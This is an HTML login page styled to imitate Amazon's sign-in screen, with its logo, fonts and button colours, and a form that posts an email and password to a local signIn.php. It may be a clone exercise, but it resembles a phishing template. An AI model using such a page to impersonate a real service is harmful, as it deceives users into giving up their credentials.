<!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8">
    <title></title>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/3.3.7/css/bootstrap.css" />
  </head>
  <style type="text/css">
  form { margin: 0px 10px;

  }

  h2 {
    margin-top: 2px;
    margin-bottom: 2px;
  }

  .container { max-width: 360px; }

  .divider {
    text-align: center;
    margin-top: 20px;
    margin-bottom: 5px;
  }

  .divider hr {
    margin: 7px 0px;
    width: 35%;
  }
.panel-primary{
  display: block;
  border-radius: 4px;
  border: 1px #ddd solid;
}
  .left { float: left; }

  .right { float: right; }
#signinSubmit{
  background: #f0c14b;
  background: linear-gradient(to bottom,#f7dfa5,#f0c14b);
  border-color: #a88734 #9c7e31 #846a29;
  color: #111;
  width: 100%;
  border-style: solid;
  border-width: 1px;
  cursor: pointer;
  display: inline-block;
  padding: 0;
  text-align: center;
  text-decoration: none!important;
  font-family: "Amazon Ember",Arial,sans-serif;
  font-size: 13px;
  vertical-align: middle;
  box-sizing: border-box;
  line-height: 19px;
  border-radius: 3px;
  text-align: center;
  white-space: nowrap;
  font-size: 13px;
  line-height: 29px;
  margin-bottom: 20px!important;
  margin-top: 10px!important;
}
#signup{
  background: #e7e9ec;
    background: linear-gradient(to bottom,#f7f8fa,#e7e9ec);
    border-radius: 3px;
    border-color: #adb1b8 #a2a6ac #8d9096;
    color: #111;
    width: 100%;
    border-style: solid;
    border-width: 1px;
    cursor: pointer;
    display: inline-block;
    padding: 0;
    text-align: center;
    text-decoration: none!important;
    font-family: "Amazon Ember",Arial,sans-serif;
    font-size: 13px;
    vertical-align: middle;
    box-sizing: border-box;
    line-height: 19px;
    border-radius: 3px;
    text-align: center;
    white-space: nowrap;
    font-size: 13px;
    line-height: 29px;
    margin-bottom: 44px!important;
    margin-top: 26px!important;
}
  </style>
  <body>
    <center>
    <img src="image/Amazon-logo.png" alt="" style="height:100px; width:250px">
  </center>
    <div class="container">
    <div class="row">
      <div class="panel panel-primary">
        <div class="panel-body">
          <form method="POST" action="signIn.php" role="form">
            <div class="form-group">
              <h2>Sign in</h2>
            </div>
            <div class="form-group">
              <strong>Email(phone for mobile accounts)</strong>
              <input id="signinEmail" type="email" maxlength="50" class="form-control" name="email">
            </div>
            <div class="form-group">
              <strong>Password</strong>
              <span class="right"><a href="#">Forgot your password?</a></span>
              <input id="signinPassword" type="password" maxlength="25" class="form-control" name="password">
            </div>
            <div class="form-group" style="padding-top: 12px;">
              <button id="signinSubmit" type="submit" class="btn btn-success btn-block" value="verifier">Sign in</button>
            </div>
            <div class="form-group divider">
              <hr class="left"><small>New to site?</small><hr class="right">
            </div>
            <p class="form-group"><a href="register.html" id="signup" class="btn btn-info btn-block">Create an account</a></p>
            <p class="form-group">By signing in you are agreeing to our <a href="#">Terms of Use</a> and our <a href="#">Privacy Policy</a>.</p>
          </form>
        </div>
      </div>
    </div>
    </div>

  </body>
</html>
